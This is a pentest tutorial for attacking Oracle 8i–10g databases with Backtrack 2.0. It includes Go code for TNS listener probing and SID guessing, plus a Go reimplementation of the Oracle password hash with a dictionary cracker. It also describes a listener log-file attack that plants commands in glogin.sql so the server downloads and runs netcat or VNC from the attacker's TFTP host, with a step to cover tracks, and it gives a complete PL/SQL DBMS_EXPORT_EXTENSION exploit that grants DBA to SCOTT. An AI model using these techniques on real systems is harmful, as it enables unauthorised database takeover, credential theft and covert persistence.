& Oracle
The following short tutorial explains how to do a (limited) pentest against Oracle (8.1.7.4 to 10.2.0.2) with Backtrack 2.0. This tutorial will be extended in the future…
I want to thank the entire Backtrack team for this great collection of security tools and Max for the collaboration.
Nowadays there are many Oracle 10g databases around. Oracle did a good (but not perfect) job of hardening the database out of the box. Most tutorials still describe how to break older 8i/9i databases, and most of the older tools do not work against the new 10g listener. We will show how to find and connect to an Oracle database, crack Oracle password hashes, attack the TNS listener and escalate privileges.
At a glance:
1. Find the Oracle database + port of the listener (with nmap/amap)
We can use nmap or amap to identify the port where the TNS listener is running (1521 by default). Both tools are installed on the Backtrack CD.
nmap -v <IP-ADDRESS>
Sample: Oracle 9i
Get SID/Servicename
From Oracle 7 up to 9i Release 2 the listener always returned the SID/service name of the registered Oracle databases via the listener status command. Since Patchset 9.2.0.6 (with password protection) and in Oracle 10g the listener no longer returns these values.
The SID or service name is mandatory for connecting to the database via OCI. Without the SID it is not possible to connect to Oracle.
In unprotected 8i/9i environments the easiest way to get this information is the listener status command. It returns a lot of useful information: version number, operating system, patch level, ORACLE_HOME, SID, ports, …
Now we know:
Version: 9.2.0.1
Operating System: Windows
Oracle_Home: c:\oracle\ora92
Extproc installed: YES
Ports: 1521 (TNS), 2100 (FTP), 8080 (HTTP)
SID: ora9201
Now we know that the SID is ora9201. We can use this value to connect to the Oracle database using sqlplus or checkpwd.
If the Oracle 9i listener is password protected, the status command fails with TNS-01169 (the listener has not recognized the password).
In the case of an Oracle 10g listener (protected with local OS authentication) the status command fails with a different error, TNS-01189 (the listener could not authenticate the user).
In both cases the listener refuses administrative commands such as status from remote clients: the 10g listener accepts them only from the OS user on the database host, and the password-protected 9i listener requires the listener password. We can then try a dictionary or brute-force attack on the SID with sidguess, which sends a connect request for every candidate SID and distinguishes an unknown SID (the listener answers with ORA-12505) from a known one.
Now we know that the SID of this database is XE and we have all the information necessary to connect to the database. We still need an Oracle account, though.
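The two listener exchanges used above, the status request against an 8i/9i listener and the connect probe that sidguess repeats for every candidate SID, as an added example in Go (not code from the tutorial or from the Backtrack tools): it builds the TNS CONNECT packet, parses the listener's REFUSE or DATA answer, decodes VSNNUM into a version string and classifies a SID probe by its ORA- code. The sample reply is constructed (the NV string a 10g listener returns to a remote status request, TNS-01189, wrapped here in a REFUSE packet; a real listener may deliver the same string in a DATA packet after an ACCEPT, which the parser also handles). The NT-protocol-characteristics value is the one seen in real client traces and is not security-relevant.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"strconv"
	"strings"
)

// TNS packet types (public protocol layout, as used by tnscmd.pl and Wireshark).
const tnsConnect, tnsAccept, tnsRefuse, tnsRedirect, tnsData = 1, 2, 4, 5, 6

// BuildConnect wraps a connect string in a TNS CONNECT packet: an 8-byte packet header
// plus a 50-byte connect header, so the connect data starts at offset 58 (tnscmd.pl's layout).
func BuildConnect(connectData string) []byte {
	cd := []byte(connectData)
	p := make([]byte, 58, 58+len(cd))
	be := binary.BigEndian
	be.PutUint16(p[0:], uint16(58+len(cd))) // packet length; checksums at 2 and 6 stay 0
	p[4] = tnsConnect                       // packet type
	be.PutUint16(p[8:], 0x0136)             // TNS version 310
	be.PutUint16(p[10:], 0x012c)            // lowest compatible version 300
	be.PutUint16(p[14:], 2048)              // SDU
	be.PutUint16(p[16:], 32767)             // TDU
	be.PutUint16(p[18:], 0x4f98)            // NT protocol characteristics
	be.PutUint16(p[22:], 1)                 // hardware byte-order marker
	be.PutUint16(p[24:], uint16(len(cd)))   // connect data length
	be.PutUint16(p[26:], 58)                // connect data offset
	// offsets 28..57 (max receivable data, ANO flags, trace fields) stay zero
	return append(p, cd...)
}

// Reply: packet type, NV-string payload of a REFUSE/DATA packet, and its ERR=<n> code (0 if absent).
type Reply struct {
	Type byte
	Text string
	Err  int
}

// ParseReply decodes one listener packet. REFUSE carries its text after user reason (1),
// system reason (1) and data length (2); DATA carries it after 2 bytes of flags.
func ParseReply(pkt []byte) (Reply, error) {
	if len(pkt) < 8 {
		return Reply{}, fmt.Errorf("short packet (%d bytes)", len(pkt))
	}
	plen := int(binary.BigEndian.Uint16(pkt[0:]))
	if plen < 8 || plen > len(pkt) {
		return Reply{}, fmt.Errorf("bad packet length %d", plen)
	}
	r := Reply{Type: pkt[4]}
	start := map[byte]int{tnsRefuse: 12, tnsData: 10}[r.Type]
	switch {
	case r.Type == tnsAccept || r.Type == tnsRedirect:
		return r, nil // no text, but the SID or command was accepted
	case start == 0:
		return r, fmt.Errorf("unexpected packet type %d", r.Type)
	case plen < start:
		return r, fmt.Errorf("truncated payload")
	}
	r.Text = string(pkt[start:plen])
	r.Err, _ = strconv.Atoi(NVValue(r.Text, "ERR")) // stays 0 when ERR is absent
	return r, nil
}

// NVValue returns the value of a flat (KEY=value) pair in an NV string, "" if absent.
func NVValue(text, key string) string {
	if i := strings.Index(text, "("+key+"="); i >= 0 {
		rest := text[i+len(key)+2:]
		if j := strings.IndexByte(rest, ')'); j >= 0 {
			return rest[:j]
		}
	}
	return ""
}

// VsnToVersion decodes VSNNUM: 8 bits major, 4 minor, 8 maintenance, 4 patch, 8 port.
func VsnToVersion(v uint32) string {
	return fmt.Sprintf("%d.%d.%d.%d.%d", v>>24, (v>>20)&0xF, (v>>12)&0xFF, (v>>8)&0xF, v&0xFF)
}

// ClassifySID interprets the reply to a (CONNECT_DATA=(SID=x)) probe, the check a SID
// guesser makes for each candidate: an unknown SID is refused with ORA-12505.
func ClassifySID(r Reply) string {
	if r.Type == tnsAccept || r.Type == tnsRedirect {
		return "valid"
	}
	if r.Err == 12505 {
		return "unknown SID"
	}
	return "refused with ORA-" + strconv.Itoa(r.Err) // other codes: the SID may still exist
}

// SampleRefuse wraps a constructed NV string in a REFUSE packet (test data only).
func SampleRefuse(text string) []byte {
	p := make([]byte, 12, 12+len(text))
	binary.BigEndian.PutUint16(p[0:], uint16(12+len(text)))
	p[4], p[8], p[9] = tnsRefuse, 34, 0 // type, user reason, system reason
	binary.BigEndian.PutUint16(p[10:], uint16(len(text)))
	return append(p, text...)
}
```

For a live probe, open a TCP connection to the listener port, write BuildConnect("(CONNECT_DATA=(COMMAND=status))") or BuildConnect("(CONNECT_DATA=(SID=XE))") and feed the first packet read back into ParseReply. The listener inspects only the connect string, so the packet carries no authentication of any kind; that is why an unprotected listener leaks its version and SIDs to anyone who can reach port 1521, and why the 10g listener answers status with ERR=1189 instead.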
sqlplus user/password@//<IP_ADDRESS>:<PORT>/<SID>
At the prompt we can run any SQL command (according to our privileges).
checkpwd reads the password hashes of all users from DBA_USERS (so the account it connects with needs that privilege) and tests them against a dictionary file. In Oracle 7 to 10g the hash is not reversible, so "decrypting" a password means finding a dictionary word that produces the same hash:
checkpwd system/alexora1@//192.168.2.232/ora9201 default_passwords.txt
Oracle 10g
In Oracle 10g (with listener OS authentication) the listener returns an error message for the status request, but checkpwd can still check the password hashes once the SID is known:
checkpwd system/alexora1@//192.168.2.234/xe default_passwords.txt
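What checkpwd does with the hashes it reads from DBA_USERS, as an added example in Go (not checkpwd's own code): OracleHash reproduces the Oracle 7 to 10g password hash and CheckPasswords runs a word list against a set of user/hash pairs. The account names, the hashes of the default accounts SCOTT/TIGER and SYSTEM/MANAGER, the dummy account ALEX and the word list are constructed test data.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// OracleHash reproduces the Oracle 7 to 10g password hash stored in DBA_USERS.PASSWORD
// (the value checkpwd compares against). The algorithm is public:
//   1. uppercase(username || password)            -- the username acts as the salt
//   2. widen every character to 16 bits big-endian (0x00 before each ASCII byte)
//   3. zero-pad to a multiple of the DES block size (8 bytes)
//   4. DES-CBC, key 0123456789ABCDEF, IV 0: the last ciphertext block becomes the second key
//   5. DES-CBC again with that key, IV 0: the last block, as uppercase hex, is the hash
// Non-ASCII characters are outside this example (the real widening depends on the
// database character set).
func OracleHash(username, password string) string {
	s := strings.ToUpper(username + password)
	buf := make([]byte, 0, 2*len(s)+8)
	for _, c := range []byte(s) {
		buf = append(buf, 0x00, c)
	}
	if rem := len(buf) % 8; rem != 0 {
		buf = append(buf, make([]byte, 8-rem)...)
	}
	fixedKey := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF}
	secondKey := lastCBCBlock(fixedKey, buf)
	return strings.ToUpper(hex.EncodeToString(lastCBCBlock(secondKey, buf)))
}

// lastCBCBlock DES-CBC-encrypts data (already a multiple of 8 bytes) under key with a
// zero IV and returns the final ciphertext block, which is all the algorithm keeps.
func lastCBCBlock(key, data []byte) []byte {
	block, err := des.NewCipher(key)
	if err != nil {
		panic(err) // the key is always 8 bytes here
	}
	out := make([]byte, len(data))
	cipher.NewCBCEncrypter(block, make([]byte, des.BlockSize)).CryptBlocks(out, data)
	return out[len(out)-des.BlockSize:]
}

// CheckPasswords is the offline core of a checkpwd-style run: for every user/hash pair
// (as read from DBA_USERS) try each dictionary word and report the matches. Because the
// username is part of the hash input, every account has to be tried separately; a word
// list cannot be hashed once and reused across accounts.
func CheckPasswords(accounts map[string]string, dictionary []string) map[string]string {
	found := make(map[string]string)
	for user, hash := range accounts {
		hash = strings.ToUpper(hash)
		for _, word := range dictionary {
			if OracleHash(user, word) == hash {
				found[user] = word
				break
			}
		}
	}
	return found
}

func main() {
	// Constructed sample: the stored hashes of the default accounts SCOTT/TIGER and
	// SYSTEM/MANAGER, plus an account whose password is not in the word list.
	accounts := map[string]string{
		"SCOTT":  "F894844C34402B67",
		"SYSTEM": "D4DF7931AB130E37",
		"ALEX":   "0000000000000000",
	}
	dictionary := []string{"welcome1", "tiger", "manager", "oracle"}
	for user, pw := range CheckPasswords(accounts, dictionary) {
		fmt.Printf("%s: %s\n", user, pw)
	}
}
```

The detail worth noticing is step 1: because the username is hashed together with the password, two users with the same password get different hashes and the word list must be hashed once per account. A 10g hash is still only two DES operations, so a list of default and weak passwords runs through in seconds; this is what makes checkpwd against a dba_users dump so effective.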
Hack the TNS listener (log file attack)
An unprotected 8i/9i listener accepts administrative commands (status, set log_directory, set log_file) from any host, and it writes every connect request, including failed ones, verbatim into its log file. The log file can therefore be redirected to a file that another program later interprets.
First we copy an executable for the target platform (e.g. vncserver.exe or netcat) into the directory /tmp, from which the TFTP server on the Backtrack machine serves it.
Next we need the path of ORACLE_HOME, which the (unprotected) TNS listener reveals in its status output.
The next step is to change the directory and name of the listener log file, e.g. to c:\oracle\ora92\sqlplus\admin\glogin.sql, the site profile that SQL*Plus executes every time it starts.
Instead of modifying glogin.sql it is also possible to write into .rhosts (a security-aware DBA should NEVER run R*-services on a Unix server) or to upload an authorized_keys file for SSH. This is not shown here.
Now we send connect requests whose connect strings contain OS commands (download the binary from the TFTP server and execute it, via the SQL*Plus host command) and SQL commands (create a new database user). The listener writes them into its log file, which is now glogin.sql. SQL*Plus reports the surrounding log text as unknown commands but still executes the lines it understands.
Then we set the listener log file back to its original value so that the DBA notices nothing.
The next time the DBA uses sqlplus on the database server, the code in glogin.sql is executed: vncserver.exe (or netcat) is downloaded and started.
Now we can use a VNC client to connect to the server, or connect to the database with our newly created user backtrack20.
GAME OVER – Server 0wned.
Privilege Escalation
There are various ways to escalate privileges.
First we connect to the database as a user with the CREATE PROCEDURE privilege. As we can see, we do not have DBA privileges (desc dba_users fails).
sqlplus scott/tiger@//192.168.2.238/ora9207
-- Create a package with a function of the ODCIIndexGetMetadata signature and inject it
-- into DBMS_EXPORT_EXTENSION: GET_DOMAIN_INDEX_METADATA builds dynamic SQL from the
-- TYPE_SCHEMA and TYPE_NAME parameters and calls our function with the privileges of
-- the package owner, SYS. Whatever the function body does therefore runs as SYS.
CREATE OR REPLACE
PACKAGE BT20_EXPLOIT AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv)
  RETURN NUMBER;
END;
/

-- Package body: executed as SYS, it grants DBA to the connecting user (SCOTT here).
CREATE OR REPLACE
PACKAGE BODY BT20_EXPLOIT
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv)
  RETURN NUMBER
  IS
    PRAGMA AUTONOMOUS_TRANSACTION; -- DDL from inside a function needs its own transaction
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
    COMMIT;
    RETURN 1;
  END;
END;
/

-- Trigger the call: INDEX_NAME/INDEX_SCHEMA are only passed through,
-- TYPE_SCHEMA/TYPE_NAME select the package that SYS ends up calling.
DECLARE
  INDEX_NAME   VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME    VARCHAR2(200);
  TYPE_SCHEMA  VARCHAR2(200);
  VERSION      VARCHAR2(200);
  NEWBLOCK     PLS_INTEGER;
  GMFLAGS      NUMBER;
  v_Return     VARCHAR2(200);
BEGIN
  INDEX_NAME   := 'A1';
  INDEX_SCHEMA := 'SCOTT';
  TYPE_NAME    := 'BT20_EXPLOIT';
  TYPE_SCHEMA  := 'SCOTT';
  VERSION      := '10.2.0.2.0';
  GMFLAGS      := 1;
  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
                INDEX_NAME   => INDEX_NAME,
                INDEX_SCHEMA => INDEX_SCHEMA,
                TYPE_NAME    => TYPE_NAME,
                TYPE_SCHEMA  => TYPE_SCHEMA,
                VERSION      => VERSION,
                NEWBLOCK     => NEWBLOCK,
                GMFLAGS      => GMFLAGS);
END;
/
Now we must log out and log in again: the DBA role has been granted to SCOTT but only becomes active in a new session. After that we are DBA (desc dba_users now works), provided the system was not patched or updated to the latest version; Oracle fixed this DBMS_EXPORT_EXTENSION issue in a Critical Patch Update.